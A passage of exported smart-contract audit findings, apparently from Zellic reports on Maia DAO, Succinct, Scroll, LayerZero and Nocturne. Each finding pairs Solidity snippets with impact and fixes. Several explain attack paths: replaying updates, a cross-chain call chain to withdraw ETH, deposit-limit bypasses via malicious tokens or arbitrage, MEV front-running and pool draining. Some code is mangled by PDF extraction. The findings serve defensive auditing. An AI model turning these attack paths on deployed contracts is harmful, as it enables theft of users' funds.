userGaugeFlywheels[msg.sender][strategy]. (e) Deletes the index of the flywheel address from userGaugeflywheelId[msg.sender][strategy][flywheel]. Inputs strategy \u2013 Constraints: The userFlywheelId should not be zero for the provided strategy and flywheel. \u2013 Impact: The strategy address for which the user will optOut, but only after the optIn call. 
flywheel \u2013 Constraints: The userFlywheelId should not be zero for the provided strategy and flywheel. \u2013 Impact: The flywheel address for which the user will optOut, but only after the optIn call. Branches and code coverage (including function calls) Intended branches The userGaugeflywheelId == 0 after the call. 4\u25a1 Test coverage The flywheelStrategyGaugeWeight decremented. \u25a1 Test coverage Negative behavior Zellic Maia DAO msg.sender did not optIn before for strategy and flywheel. 4\u25a1 Negative test msg.sender did not optIn before for strategy. 4\u25a1 Negative test msg.sender did not optIn before for flywheel. 4\u25a1 Negative test The case when length != userFlywheelId. \u25a1 Negative test Function call analysis flywheel.accrue(strategy, msg.sender) \u2013 What is controllable? flywheel and strategy. \u2013 If return value controllable, how is it used and how can it go wrong? N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow? If reverted, the user will not be able to optIn and the user\u2019s balance will not be able to take into account total supply. bHermesGauges(owner()).getUserGaugeWeight(msg.sender, address(strategy)) \u2013 What is controllable? strategy. \u2013 If return value controllable, how is it used and how can it go wrong? Return the user\u2019s allocated weight to that gauge (strategy). \u2013 What happens if it reverts, reenters, or does other unusual control flow? No problem \u2014 just view function. Zellic Maia DAO 5 Assessment Results At the time of our assessment, the reviewed code was not deployed to the Ethereum Mainnet. During our assessment on the scoped Maia DAO V2 Ecosystem contracts, we discovered one finding, which was of high impact. Maia DAO acknowledged the finding and implemented a fix.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO V2 Ecosystem - Zellic Audit Report.pdf" }, { "title": "3.1 Missing replay protection on step", "labels": [ "Zellic" ], "body": "Target: LightClient Category: Coding Mistakes Likelihood: High Severity: High Impact: High One of the methods to update the state of the light client is the step function, which can be called when the light client has an existing sync committee poseidon for the requested finalizedSlot: function step(LightClientStep memory update) external { bool finalized = processStep(update); if (getCurrentSlot() < update.attestedSlot) { revert(\"Update slot is too far in the future\"); } if (finalized) { setHead(update.finalizedSlot, update.finalizedHeaderRoot); setExecutionStateRoot(update.finalizedSlot, update.executionStateRoot); setTimestamp(update.finalizedSlot, block.timestamp); } else { revert(\"Not enough participants\"); } } If the proof is verified and finalized, the head, execution state root, and timestamp for the slot are all updated: /// @notice Sets the current slot for the chain the light client is reflecting. function setHead(uint256 slot, bytes32 root) internal { if (headers[slot] != bytes32(0) && headers[slot] != root) { consistent = false; Zellic Succinct return; } head = slot; headers[slot] = root; emit HeadUpdate(slot, root); } /// @notice Sets the execution state root for a given slot. function setExecutionStateRoot(uint256 slot, bytes32 root) internal { if (executionStateRoots[slot] != bytes32(0) && executionStateRoots[slot] != root) { consistent = false; return; } executionStateRoots[slot] = root; } /// @notice Sets the sync committee poseidon for a given period. 
function setSyncCommitteePoseidon(uint256 period, bytes32 poseidon) internal { if ( syncCommitteePoseidons[period] != bytes32(0) && syncCommitteePoseidons[period] != poseidon ) { consistent = false; return; } syncCommitteePoseidons[period] = poseidon; emit SyncCommitteeUpdate(period, poseidon); } function setTimestamp(uint256 slot, uint256 timestamp) internal { timestamps[slot] = timestamp; } The issue is there is no check to ensure the new finalizedSlot is greater than the current head and no check to ensure that a previous call to step is not being replayed. If the same LightClientStep update is used a second time, it will pass all of the checks and roll back the current head to the finalizedSlot from the previous update and set the timestamp for the slot to the current block timestamp. Zellic Succinct As replaying a previous update will cause the timestamp for that slot to be updated, this then prevents it from being used for another five minutes due to the minimum delay: /// @notice The minimum delay for using any information from the light client. uint256 public constant MIN_LIGHT_CLIENT_DELAY = 60 * 5; /// @notice Checks that the light client delay is adequate. function requireLightClientDelay(uint64 slot, uint32 chainId) internal view { uint256 elapsedTime = block.timestamp - lightClients[chainId].timestamps(slot); require(elapsedTime >= MIN_LIGHT_CLIENT_DELAY, \"Must wait longer to use this slot.\"); } A malicious user could continually replay an update message to prevent that slot from being used, as the requireLightClientDelay check would constantly revert. A check should be added to ensure that the head slot is only ever increasing. The issue has been fixed in commit 485c2474. Zellic Succinct", "html_url": "https://github.com/Zellic/publications/blob/master/Succinct Telepathy - Zellic Audit Report.pdf" }, { "title": "3.2 Frozen state not used on source chain", "labels": [ "Zellic" ], "body": "Target: SourceAMB Category: Business Logic Likelihood: Low Severity: Low Impact: Medium To send a message to another chain, a user interacts with the SourceAMB contract on the source chain, waits for the corresponding light client to be synchronized on the recipient chain, and then interacts with the TargetAMB contract on the recipient chain. As a safety mechanism, a source chain can be frozen to prevent any messages received from being executed. The TargetAMB contract uses a frozen mapping to keep track of which chains are frozen. The SourceAMB contract does not use this mapping, despite inheriting the TelepathyStorage contract. For the SourceAMB contract, a sendingEnabled global variable is used as an alternative, which should dictate whether or not the sending component of the messages is enabled. The naming and the states are not, however, consistent with the TargetAMB contract. In case the TargetAMB freezes a SourceAMB chain before the sendingEnabled is set to false on the SourceAMB, the SourceAMB contract will still be able to send messages to the TargetAMB contract even though they cannot be received. This is not a security issue, but it is a potential source of confusion and could lead to unexpected behavior such as assets being locked up on one side of a bridge. We recommend that the SourceAMB contract also use the frozen mapping to keep track of which chains are frozen, similar to the current implementation of the TargetAMB contract. A sketch of such a check follows below. 
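As a rough illustration only: the function name and the keying of the frozen mapping below are assumptions about how a sending-side check could look, not the audited implementation or Succinct's fix.

    // Sketch of a SourceAMB that consults the shared frozen state before sending.
    contract SourceAMBSketch {
        bool public sendingEnabled;
        mapping(uint32 => bool) public frozen; // assumed to mirror TelepathyStorage's mapping

        function send(uint32 destinationChainId, address recipient, bytes calldata data) external {
            require(sendingEnabled, "Sending is disabled");
            // Refuse to emit messages for a route that has been frozen on the target side.
            require(!frozen[destinationChainId], "Chain is frozen");
            // ... encode and emit the message for relayers, as in the real SourceAMB ...
        }
    }
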
If not already established, an off-chain rule should also be adhered to that the freezing of a chain must begin from the SourceAMB contract\u2019s side and then spread to the TargetAMB side. This way, the freezing of a chain will be consistent across the SourceAMB and TargetAMB sides of the bridge and will be easier to reason about. Zellic Succinct The finding has been acknowledged by Succinct. Their official response is reproduced below: We are not going to address this issue, as the freezing is only meant for execution side explicitly. Zellic Succinct", "html_url": "https://github.com/Zellic/publications/blob/master/Succinct Telepathy - Zellic Audit Report.pdf" }, { "title": "3.3 Arrays\u2019 lengths are not checked", "labels": [ "Zellic" ], "body": "Target: TelepathyRouter Category: Coding Mistakes Likelihood: Low Severity: Low Impact: Medium The initialize function in the TelepathyRouter contract does not check the length of the sourceChainIds array, which is passed as a parameter. function initialize( uint32[] memory _sourceChainIds, address[] memory _lightClients, address[] memory _broadcasters, address _timelock, address _guardian, bool _sendingEnabled ) external initializer { // ... for (uint32 i = 0; i < sourceChainIds.length; i++) { lightClients[sourceChainIds[i]] = ILightClient(_lightClients[i]); broadcasters[sourceChainIds[i]] = _broadcasters[i]; frozen[sourceChainIds[i]] = false; } sendingEnabled = _sendingEnabled; version = VERSION; } Due to the fact that the initialize function is called only once, it will likely be thoroughly tested before being deployed. However, if the _sourceChainIds, _lightClients, or _broadcasters arrays mismatch in length, the initialize function will fail and the contract will be left in an uninitialized state, allowing malicious actors that monitor the transaction pool to call the initialize function and take control of the contract. Zellic Succinct We recommend adding a check to ensure that the lengths of the _sourceChainIds, _lightClients, and _broadcasters arrays are identical. function initialize( uint32[] memory _sourceChainIds, address[] memory _lightClients, address[] memory _broadcasters, address _timelock, address _guardian, bool _sendingEnabled ) external initializer { // ... require(_lightClients.length == _broadcasters.length); require(_lightClients.length == _sourceChainIds.length); for (uint32 i = 0; i < sourceChainIds.length; i++) { lightClients[sourceChainIds[i]] = ILightClient(_lightClients[i]); broadcasters[sourceChainIds[i]] = _broadcasters[i]; frozen[sourceChainIds[i]] = false; } sendingEnabled = _sendingEnabled; version = VERSION; } Additionally, we recommend removing the frozen[sourceChainIds[i]] = false; line, as it is not needed. The frozen mapping is initialized to false by default for all keys. The issue has been fixed in commit 22832db0. Zellic Succinct", "html_url": "https://github.com/Zellic/publications/blob/master/Succinct Telepathy - Zellic Audit Report.pdf" }, { "title": "3.1 The onlyOwner modifier is missing in the ScrollChain contract", "labels": [ "Zellic" ], "body": "Target: ScrollChain Category: Business Logic Likelihood: Low Severity: Medium Impact: Medium In the ScrollChain contract, the importGenesisBatch function works as an initializer for the contract. It sets the initial committed batches\u2019 hash and the first finalized state root, which are fundamental for the contract to function properly. 
Currently, there is no check on whether the function is called by the owner of the contract, which could lead to a malicious actor calling the function first. function importGenesisBatch(bytes calldata _batchHeader, bytes32 _stateRoot) external { // check genesis batch header length require(_stateRoot != bytes32(0), \"zero state root\"); // check whether the genesis batch is imported require(finalizedStateRoots[0] == bytes32(0), \"Genesis batch imported\"); (uint256 memPtr, bytes32 _batchHash) = _loadBatchHeader(_batchHeader); // check all fields except `dataHash` and `lastBlockHash` are zero unchecked { uint256 sum = BatchHeaderV0Codec.version(memPtr) + BatchHeaderV0Codec.batchIndex(memPtr) + BatchHeaderV0Codec.l1MessagePopped(memPtr) + BatchHeaderV0Codec.totalL1MessagePopped(memPtr); require(sum == 0, \"not all fields are zero\"); } require(BatchHeaderV0Codec.dataHash(memPtr) != bytes32(0), \"zero data hash\"); Zellic Scroll Tech require(BatchHeaderV0Codec.parentBatchHash(memPtr) == bytes32(0), \"nonzero parent batch hash\"); committedBatches[0] = _batchHash; finalizedStateRoots[0] = _stateRoot; emit CommitBatch(_batchHash); emit FinalizeBatch(_batchHash, _stateRoot, bytes32(0)); } The main implication is that the contract will not function as expected, since both the initial state root and the committed batch can be set to wrong values by the attacker. The Likelihood of this issue is set to Low, however, since the way the contract will theoretically be deployed should not allow for the issue to ever happen. The onlyOwner modifier should be added to the importGenesisBatch function to ensure that only the owner of the contract can call it. Alternatively, any other role can be used, as long as it is ensured that the role is only assigned to a privileged address. Remediation: This issue has been acknowledged by Scroll Tech. Zellic Scroll Tech", "html_url": "https://github.com/Zellic/publications/blob/master/Scroll - 09.27.23 Zellic Audit Report.pdf" }, { "title": "3.2 Additional checks could be performed", "labels": [ "Zellic" ], "body": "Target: L2StandardERC20Gateway, L2GasPriceOracle Category: Business Logic Likelihood: Medium Severity: Low Impact: Low Checks are an important part of secure smart contract development. More often than not, they form important invariants that must be maintained for the contract to function properly. Some of the contracts do not perform additional checks on variables or parameters. This could lead to unexpected behavior or even potential vulnerabilities down the development road. In L2StandardERC20Gateway, the first deposit of a new token on a chain typically implies deploying that token. For that, the contract checks whether the extcodesize of the token is greater than zero (i.e., the address is a contract) and deploys the token if it is not, via the _deployL2Token function. 
function finalizeDepositERC20(...) external payable override onlyCallByCounterpart nonReentrant { bool _hasMetadata; (_hasMetadata, _data) = abi.decode(_data, (bool, bytes)); bytes memory _deployData; bytes memory _callData; if (_hasMetadata) { (_callData, _deployData) = abi.decode(_data, (bytes, bytes)); } else { require(tokenMapping[_l2Token] == _l1Token, \"token mapping mismatch\"); _callData = _data; } if (!_l2Token.isContract()) { // first deposit, update mapping tokenMapping[_l2Token] = _l1Token; _deployL2Token(_deployData, _l1Token); } Zellic Scroll Tech // ... However, the contract does not check whether the _deployData is empty or not (as it does a few lines above via the _hasMetadata variable). This will lead to a revert in the _deployL2Token function, since it will not be able to decode the _deployData empty bytes array. function _deployL2Token(bytes memory _deployData, address _l1Token) internal { address _l2Token = IScrollStandardERC20Factory(tokenFactory).deployL2Token(address(this), _l1Token); (string memory _symbol, string memory _name, uint8 _decimals) = abi.decode( _deployData, (string, string, uint8) ); In L2GasPriceOracle, the setIntrinsicParams function does not perform any checks on any of the parameters: function setIntrinsicParams( uint64 _txGas, uint64 _txGasContractCreation, uint64 _zeroGas, uint64 _nonZeroGas ) public { require(whitelist.isSenderAllowed(msg.sender), \"Not whitelisted sender\"); intrinsicParams = IntrinsicParams({ txGas: _txGas, txGasContractCreation: _txGasContractCreation, zeroGas: _zeroGas, nonZeroGas: _nonZeroGas }); // ... } Zellic Scroll Tech The impact of this issue is low, since in both presented cases the function will either revert on its own eventually or only allow privileged users to call it. However, maintaining a consistent check pattern is important for the security of the contract as well as ensuring that the contract will not revert unexpectedly. We recommend adding checks to the functions to ensure that the contract will not revert unexpectedly. In the case of L2StandardERC20Gateway, we recommend adding a check on the _deployData variable to ensure that it is not empty, right before calling the _deployL2Token function. // ... if (!_l2Token.isContract()) { // first deposit, update mapping tokenMapping[_l2Token] = _l1Token; require(_deployData.length > 0, \"deploy data is empty\"); _deployL2Token(_deployData, _l1Token); } In the case of L2GasPriceOracle, we recommend adding a check on the parameters to ensure that they are not zero or that they are within a certain bound. For example, function setIntrinsicParams( uint64 _txGas, uint64 _txGasContractCreation, uint64 _zeroGas, uint64 _nonZeroGas ) public { require(whitelist.isSenderAllowed(msg.sender), \"Not whitelisted sender\"); require(_txGas > 0, \"txGas is 0\"); require(_txGasContractCreation > _txGas && _txGasContractCreation > 1e18, \"txGasContractCreation is 0 or less than txGas\"); // ... intrinsicParams = IntrinsicParams({ Zellic Scroll Tech txGas: _txGas, txGasContractCreation: _txGasContractCreation, zeroGas: _zeroGas, nonZeroGas: _nonZeroGas }); // ... } This issue has been acknowledged by Scroll Tech and a partial fix, addressing the issue in L2GasPriceOracle, has been implemented in 1437c267. 
Zellic Scroll Tech", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll - 09.27.23 Zellic Audit Report.pdf" + }, + { + "title": "3.1 Gateways call the Scroll bridge without supplying a fee", + "labels": [ + "Zellic" + ], + "body": "Target: L2ERC721Gateway, L2ERC1155Gateway Category: Business Logic Likelihood: High Severity: Medium : Medium The L2ERC721Gateway and L2ERC1155Gateway contracts perform cross-chain invo- cations by calling the sendMessage function in several different functions. However, these contracts do not send any native value or send an equal amount of native to- kens and specify the amount to be the same. This results in no fee being left for the bridge, causing the call to always revert. An example from L2ERC721Gateway can be found below. function _withdrawERC721( address _token, address _to, uint256 _tokenId, uint256 _gasLimit ) internal nonReentrant { ...)) IL2ScrollMessenger(messenger).sendMessage(counterpart, msg.value, _message, _gasLimit); ...)) } The gateways are not functional, and the cross-chain invocations made by the L2ERC721Gateway and the L2ERC1155Gateway will always fail and revert. Change the business logic to account for the bridge fee. Zellic Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 7fb4d1d3. Zellic Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll - 05.26.23 Zellic Audit Report.pdf" + }, + { + "title": "3.2 ERC1155 token minting may fail", + "labels": [ + "Zellic" + ], + "body": "Target: L2ERC1155Gateway Category: Business Logic Likelihood: Medium Severity: Medium : Medium When an ERC1155 token is transferred from L1ERC1155Gateway to the L2ERC1155Gateway, the finalizeDepositERC1155 or finalizeBatchDepositERC1155 functions are called. These, in turn, call the mint or batchMint functions of the underlying ERC1155 contract. A particular detail of both of these functions is the fact that upon minting with mint, a callback is triggered on the destination address. function finalizeDepositERC1155( address _l1Token, address _l2Token, address _from, address _to, uint256 _tokenId, uint256 _amount ) external override nonReentrant onlyCallByCounterpart { IScrollERC1155(_l2Token).mint(_to, _tokenId, _amount, \u201d\u201d); emit FinalizeDepositERC1155(_l1Token, _l2Token, _from, _to, _tokenId, _amount); } Here is the code snippet with the callback from the original ERC1155 contract: function _mint(address to, uint256 id, uint256 amount, bytes memory data) internal virtual { require(to !) address(0), \u201dERC1155: mint to the zero address\u201d); address operator = _msgSender(); uint256[] memory ids = _asSingletonArray(id); uint256[] memory amounts = _asSingletonArray(amount); _beforeTokenTransfer(operator, address(0), to, ids, amounts, data); Zellic Scroll _balances[id][to] += amount; emit TransferSingle(operator, address(0), to, id, amount); _afterTokenTransfer(operator, address(0), to, ids, amounts, data); _doSafeTransferAcceptanceCheck(operator, address(0), to, id, amount, data); } The _doSafeTransferAcceptanceCheck function is responsible for triggering the call- back function onERC1155Received if the _to address is a contract. However, if the con- tract at _to does not implement the IERC721Receiver interface, the onERC1155Received function will not be called, resulting in the failure of the mint function. 
Should _to be a contract that does not inherit the IERC1155Receiver interface, the mint function will fail, leading to the token not being minted on the L2 side as well as locking the funds on the L1 side. To solve this issue, the protocol will require the manual intervention of the counterpart address to mint the token on the L2 side to another _to address, possibly escalating into a dispute if the funds are not promptly released. We recommend exercising additional caution in this scenario because a reversion could result in the ERC1155 becoming stuck in the L1 gateway. Ideally, in the future, a system should be implemented to check the Merkle tree and recover the ERC1155 if the message fails on L2. This issue has been acknowledged by Scroll. Zellic Scroll", "html_url": "https://github.com/Zellic/publications/blob/master/Scroll - 05.26.23 Zellic Audit Report.pdf" }, { "title": "3.3 Arbitrary calldata calls on arbitrary addresses", "labels": [ "Zellic" ], "body": "Target: L1ScrollMessenger, L2ScrollMessenger, L1ETHGateway, L2ETHGateway Category: Business Logic Likelihood: N/A Severity: Medium Impact: Medium The messenger contracts allow for the relaying of messages from one chain to the other. As currently implemented, they perform a low-level call to an arbitrary address with arbitrary calldata, both supplied as messages over the bridge. This allows for the execution of external calls in the context of the messenger contract, which essentially means that calls are executed on behalf of the messenger contract. function relayMessageWithProof( address _from, address _to, uint256 _value, uint256 _nonce, bytes memory _message, L2MessageProof memory _proof ) external override whenNotPaused onlyWhitelistedSender(msg.sender) { // ... // @todo check more `_to` address to avoid attack. require(_to != messageQueue, \"Forbid to call message queue\"); require(_to != address(this), \"Forbid to call self\"); // @note This usually will never happen, just in case. require(_from != xDomainMessageSender, \"Invalid message sender\"); xDomainMessageSender = _from; (bool success, ) = _to.call{value: _value}(_message); Currently, the _to is checked against the message queue and the messenger contract itself. However, it is not checked against any other contracts, so theoretically it can call any contract\u2019s functions. Similarly, the gateways allow moving native funds from one chain to the other. The same low-level call is used; however, the calldata is currently not passed over the 
Moreover, should users give allowance to the messenger contracts, the attacker could also steal any ERC20 tokens that the user has given allowance for, by calling the transferFrom function on the respective ERC20 contracts. At present, there is no immediate security concern for this finding. However, it is worth noting that if data forwarding components are naively implemented then it opens up an avenue for a critical bug, the details follow: In the case of the gateways, an attacker could supply the L2ScrollMessenger itself as the target and supply data using the data forwarding feature such that the L1ETHGateway could be tricked into giving away ETH, as any message could be forged on behalf of the L2ETHGateway and it would be considered legitimate on the L1 side because it came from the appropriate counterpart. The total attack chain would look like this: Zellic Scroll L1EthGateway -> L1ScrollMessenger -> L2ScrollMessenger -> L2EthGateway -> finalizeDepositETH -> _to.call -> L2ScrollMessenger -> L1ScrollMessenger -> L1GatewayETH (Withdraw any amount of ETH) Another consequence of these direct calls is that user errors, such as providing ap- proval incorrectly to the scroll messenger, can be exploited by malicious users. They can make cross-chain calls from one side of the chain to the other, supplying call data to specific smart contracts or tokens, to execute functions like transferFrom. We recommend ensuring that the _to address is a contract and that it implements a custom interface. This way, even if the contract is an arbitrary one, it will need to follow Scroll\u2019s interface, ensuring the context of the call is correct and no arbitrary actions can be performed on behalf of the messenger or gateway contracts. An example of such an interface could be /) SPDX-License-Identifier: MIT pragma solidity ^0.8.0; interface IScrollCallback { ///)) @notice Handle the callback from L1/L2 contracts. ///)) @param to The address of recipient's account on L1/L2. ///)) @param amount The amount of ETH to be deposited. function handleContractCallback( bytes memory message ) external payable; } The messenger contract would then check that the _to contract implements the in- terface and call it with the message as the argument. function relayMessageWithProof( address _from, address _to, uint256 _value, uint256 _nonce, bytes memory _message, Zellic Scroll L2MessageProof memory _proof ) external override whenNotPaused onlyWhitelistedSender(msg.sender) { /) ...)) /) @todo check more `_to` address to avoid attack. require(_to !) messageQueue, \u201dForbid to call message queue\u201d); require(_to !) address(this), \u201dForbid to call self\u201d); /) @note This usually will never happen, just in case. require(_from !) xDomainMessageSender, \u201dInvalid message sender\u201d); xDomainMessageSender = _from; (bool success, ) = _to.call{value: _value}(_message);` bytes memory payload = abi.encodeWithSelector( IScrollCallback.handleContractCallback.selector, _message ); (bool success, ) = _to.call{value: _value}(payload); } The issue has been acknowledged by Scroll, and a fix was implemented in commit bfe29b41. It\u2019s important to note that neither the L1ScrollMessenger nor the L2Scroll Messenger have been updated with the fix, as the Scroll team is yet to decide on the best way to implement it. 
Zellic Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll - 05.26.23 Zellic Audit Report.pdf" + }, + { + "title": "3.1 Out-of-bounds read from toAddressBytes allows undefined behavior", + "labels": [ + "Zellic" + ], + "body": "Target: OFTCore, ONFT721Core, ONFT1155Core Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The following assembly code may read up to 32 bytes out of bounds of toAddressByt es because the size of toAddressBytes is not checked: address toAddress; assembly { toAddress :) mload(add(toAddressBytes, 20)) } There is no direct security impact of this instance of out-of-bounds read. However, this code pattern allows undefined behavior and is potentially dangerous. In the past, even low-level vulnerabilities have been chained with other bugs to achieve critical security compromises. The size of a uint is 32 bytes. So, the branch that uses the MLOAD instruction should require that the size of toAddressBytes is greater than or equal to the read size of 32 bytes. TBD Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Solidity Examples - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Attacker-deployed ERC-20s cause reentrancy and unveri- fied deposits", + "labels": [ + "Zellic" + ], + "body": "Target: Handler Category: Business Logic Likelihood: Medium Severity: High : High The deposit-limit feature limits the rate at which ERC-20 tokens can enter and be mixed by Nocturne. Another feature, the screener-signature requirement, allows Nocturne to identify the owner of funds entering the protocol in order to ensure legal compliance. One way that funds can enter Nocturne without being subject to the deposit limit or the screener-signature requirement is in the form of refund notes. At any time, the owner of previously deposited notes can issue an operation that unwraps the notes, does a series of actions (whitelisted external calls) with them, and then any assets resulting from those calls are rewrapped into new notes. The example use case for this feature is to enable Uniswap swaps of hidden assets. Nocturne takes many steps to prevent these actions from introducing new value into the protocol or introducing any reentrancy hazards, including ensuring that the tracked assets have zero balances before running the actions, requiring the top-level bundle submission call to be made from an EOA, and strictly whitelisting the calls an ac- tion can be. In the version of the configuration we audited, the only swap methods whitelisted were Uniswap\u2019s swapExactInput and swapExactInputSingle. However, a check that was missed is the tokens specified in the Uniswap swap path, including the tokenIn and path parameters. If the tokenIn parameter or any token in the path parameter is an attacker-deployed ERC-20, Uniswap will call ERC20.transfer on that token, which means the attacker can execute arbitrary code in the middle of the action. An attacker can cause arbitrary calls to be done in the middle of an action through an attacker-deployed ERC-20 token\u2019s ERC20.transfer function called by Uniswap during a swap. Zellic Nocturne These arbitrary calls can transfer funds into the Handler, which bypasses deposit limits and screener checks; reenter Nocturne functions not gated by a reentrancy guard; and execute attacks on other protocols in order to immediately deposit the proceeds from such exploitation into Nocturne. 
The Handler must ensure that all tokens Uniswap calls transfer on are legitimate tokens, tokens that do not cause attacker-specified behavior when called. For exactInputSingle, this means checking the tokenIn and tokenOut parameters, and for exactInput, this means deserializing the path parameter and checking each token in it. This issue is difficult to remediate because many tokens would need to be whitelisted for the purpose of being on a Uniswap path. (This could be a separate, more lax whitelist than the whitelist of tokens that Nocturne is willing to store.) If the best execution price for a swap that a nonmalicious user wishes to execute has a path that contains a token that is not on the whitelist, that user will have to get a suboptimal execution price for the swap. This issue has been acknowledged by Nocturne, and a fix was implemented in commits 50fe52a9 and 84f712da. Zellic Nocturne", "html_url": "https://github.com/Zellic/publications/blob/master/Nocturne - Zellic Audit Report.pdf" }, { "title": "3.2 Arbitrage opportunities bypass deposit limits", "labels": [ "Zellic" ], "body": "Target: Handler Category: Business Logic Likelihood: Low Severity: High Impact: High See Finding 3.1 for a description of the security guarantees around the external calls an action in an operation can make. One logical consequence of allowing actions to execute swaps is that they can turn a profit by finding arbitrage opportunities between cycles of Uniswap pools. This is normally alright, but attackers can create larger-than-usual arbitrage opportunities by spending money outside Nocturne. If they do that and then resolve that arbitrage opportunity inside the protocol using an action, they have effectively made a deposit that bypasses the deposit limits and the screener-signature requirement. If an attacker works with an Ethereum block builder, they can create an arbitrage opportunity immediately before the bundle gets processed by intentionally imbalancing a chosen cycle of Uniswap pools. For example, if they choose tokens A, B, and C, they can use the A/B pool to trade A for B, and then use the B/C and C/A pools together to trade B for A. The former pool will have an inflated quantity of A and a scarcity of B, and the latter pair of pools will have an inflated quantity of B and a scarcity of A. The process can be repeated until all the funds have been spent on imbalancing the pool (or, a sufficiently large flash loan can be taken out so that all the funds the attacker wishes to \u201cdeposit\u201d are spent imbalancing the pool in one or a few cycles \u2014 this saves gas). Then, after the arbitrage opportunity is set up outside Nocturne, they execute a swap inside Nocturne rebalancing that cycle and extracting most of the funds they spent on imbalancing the pool, minus fees. Those funds are then added as refund notes, bypassing deposit limits and the screener-signature requirement. An attacker must work with a block builder to execute this type of deposit because otherwise there is a significant risk of losing the funds to an arbitrage bot. Safely check the total value of the assets before and after an action that does a swap, and reject the swap as unsafe if the increase in total value exceeds a threshold. If this Zellic Nocturne check is done on-chain (and bundle submission is still permissionless), care must be taken so that the oracle cannot also be manipulated. This issue has been acknowledged by Nocturne. 
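A fragment sketching the recommended before/after check; valueOracle, MAX_GAIN_BPS, Operation, and _executeActions are hypothetical names, and the genuinely hard part, an oracle that itself cannot be manipulated, is out of scope of this sketch:

    uint256 constant MAX_GAIN_BPS = 50; // tolerate at most 0.5% of value appearing during an action (illustrative)

    function _executeActionsChecked(Operation calldata op) internal {
        uint256 valueBefore = valueOracle.totalValue(op.trackedAssets);
        _executeActions(op);
        uint256 valueAfter = valueOracle.totalValue(op.trackedAssets);
        // Reject actions that conjure more value than the threshold allows.
        require(valueAfter <= valueBefore + (valueBefore * MAX_GAIN_BPS) / 10_000, "suspicious value gain");
    }
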
Zellic Nocturne", + "html_url": "https://github.com/Zellic/publications/blob/master/Nocturne - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Bundler calls can be identified by MEV bots and front-run", + "labels": [ + "Zellic" + ], + "body": "Target: Teller Category: Protocol Risks Likelihood: Low Severity: Low : Low Since being a bundler is permissionless, anyone can call Teller.processBundle to sub- mit any valid bundle of operations. When submitting a bundle, the bundler pays for the gas spent in both verifying the proofs and executing the actions via Ethereum transaction fees. During the transaction, it then gets reimbursed for that gas via a transfer of unwrapped assets earmarked for gas. However, this presents a perverse economic incentive for MEV-aware Ethereum block builders. Before including a processBundle transaction from a benign bundler in an Ethereum block, if a block builder simulates the transaction, they will find that if they front-run the transaction with an identical transaction sent from their own ad- dress instead, the transaction will happen in the same way, except they pay the gas cost and then they are paid the gas refund instead of the bundler. Doing this would cause the real bundler\u2019s transaction to revert, but the real bundler still pays the gas for verifying the proofs. In processBundle, function processBundle( Bundle calldata bundle ) { external override whenNotPaused nonReentrant onlyEoa returns (uint256[] memory opDigests, OperationResult[] memory opResults) Operation[] calldata ops = bundle.operations; /) ---)) snip ---)) (bool success, uint256 perJoinSplitVerifyGas) = _verifyAllProofsMetered( Zellic Nocturne ops, opDigests ); require(success, \u201dBatch JoinSplit verify failed\u201d); uint256 numOps = ops.length; opResults = new OperationResult[](numOps); for (uint256 i = 0; i < numOps; i+)) { try _handler.handleOperation( ops[i], perJoinSplitVerifyGas, msg.sender ) returns (OperationResult memory result) { /) ---)) snip ---)) Note that first, a call to _verifyAllProofsMetered occurs, which expensively verifies the proofs and measures the gas required, setting perJoinSplitVerifyGas. Next, the call to handleOperation calls _processJoinSplitsReservingFee, which checks the nul- lifiers. This is what reverts in a second call, because the nullifiers will already have been used. This means that, from a MEV-seeking block builder\u2019s perspective, if they front-run the bundler\u2019s transaction, they will still be paid for the gas price of verifying the proof. They need to pay it in their transaction, but the real bundler\u2019s reverted transaction will repay them about the same amount. So, they profit if they execute this front-run, and the real bundler is not repaid for the gas they spend on the proof verification. Block builders are perversely incentivized to front-run the submission of bundles by bundlers. In a perfect economy, this means all bundlers must work with block builders or else their transactions will be reverted, front-run by the block builder issuing the same transaction, and they will pay for the gas for the verification circuit without any reimbursement. This disincentivizes block builders from building blocks. Check the nullifiers of the joinsplits before checking the proofs so that a repeat sub- mission of the same Operation fails much more cheaply, rendering the front-running of bundle submissions economically unviable. Zellic Nocturne This issue has been acknowledged by Nocturne. 
Nocturne will ensure that bundlers submit their transactions through Flashbots Protect, which protects against front-running. Zellic Nocturne", "html_url": "https://github.com/Zellic/publications/blob/master/Nocturne - Zellic Audit Report.pdf" }, { "title": "3.4 Operation with zero joinsplits can be tampered with", "labels": [ "Zellic" ], "body": "Target: Handler Category: Business Logic Likelihood: Low Severity: Low Impact: Low When an operation is processed in a transaction submitted by a bundler, it can specify an arbitrary sequence of external calls to perform. These calls are checked by calculating the digest of the Operation struct and then supplying that digest as a public input into the joinsplit circuits. However, if an operation has zero joinsplits, no joinsplit circuits are verified, and so a bundler can freely change the calls executed. There is not much impact, because if an operation has no joinsplits, no assets are unwrapped, and so the external calls only have access to the assets present in the contract before the operation (in the typical case, no assets). Additionally, if an operation has no joinsplits, there is no way to repay the bundler for gas, so a bundler is disincentivized from including it in the bundle in the first place. However, a user can still submit such an operation, and if they do, the bundler can modify it at will. Disallow operations with no joinsplits. This issue has been acknowledged by Nocturne, and a fix was implemented in commit 50fe52a9. Zellic Nocturne", "html_url": "https://github.com/Zellic/publications/blob/master/Nocturne - Zellic Audit Report.pdf" }, { "title": "3.4 Centralized pricing arbitrage", "labels": [ "Zellic" ], "body": "Target: Market Category: Business Logic Likelihood: High Severity: High Impact: High As the protocol uses a combination of automated market maker (AMM) oracles and centralized prices provided in signatures, an arbitrage opportunity may exist that will result in the drainage of pools. function borrow(...) public virtual returns (uint256 debt_shares) { require( checkSignature(authorizer, market, price, deadline, v, r, s), \"invalid.signature\" ); require(authorizer == _owner, \"authorizer\"); require(market == address(this), \"market\"); require(deadline >= block.timestamp, \"expired\"); // protect against price manipulation require(validatePrice(price, amount), \"invalid.price\"); debt_shares = _debt.withdraw(amount, receiver, owner); } } The signatures have a deadline of five minutes and can be constantly polled from off-chain components. A malicious user could continuously poll these signatures, waiting for the increase in price of those tokens, and exploit the price difference between the signed 